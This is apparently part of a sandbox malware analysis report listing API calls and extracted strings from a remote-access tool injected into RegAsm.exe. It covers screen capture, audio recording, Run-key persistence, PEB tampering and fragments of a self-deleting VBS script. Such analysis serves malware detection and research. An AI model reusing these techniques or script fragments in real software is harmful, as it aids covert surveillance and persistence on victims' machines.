                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1663032902-0
                                                                                                                                                                      • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                                                      • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                                                                                      • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                                                      • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2692324296-0
                                                                                                                                                                      • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                      • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                                                                                      • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                      • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                      • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                                                      • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                                                                                      • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                                                      • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1084509184-0
                                                                                                                                                                      • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                                      • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                                                                                      • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                      • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                      • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                      • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                                                                                        • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                                                                                                      • GetIconInfo.USER32 ref: 00418FF8
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00419027
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00419034
                                                                                                                                                                      • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                                                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                                                                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                                                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                      • String ID: DISPLAY
                                                                                                                                                                      • API String ID: 4256916514-865373369
                                                                                                                                                                      • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                                                      • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                                                                                                      • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                                                      • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                        • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                                                                        • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                        • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                        • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                        • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                      • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                      • API String ID: 1861856835-1447701601
                                                                                                                                                                      • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                                                                                                      • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                                                                                                      • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                                                                                                      • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                        • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                                                                                        • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                        • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                        • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                        • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,639B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                      • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                                                                                                      • API String ID: 3797177996-2483056239
                                                                                                                                                                      • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                                                                                                                      • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                                                                                                                      • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                                                                      • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                                                                        • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                                      • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                                                                                      • API String ID: 2649220323-436679193
                                                                                                                                                                      • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                                                                      • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                                                                                      APIs
                                                                                                                                                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                                                                                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                                                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                                                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                                                                      • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                                                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                                                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                                                      • API String ID: 738084811-2094122233
                                                                                                                                                                      • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                                                      • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                                                                                      • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                                                      • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Write$Create
                                                                                                                                                                      • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                      • API String ID: 1602526932-4212202414
                                                                                                                                                                      • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                                      • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                                                                      • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                                      • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
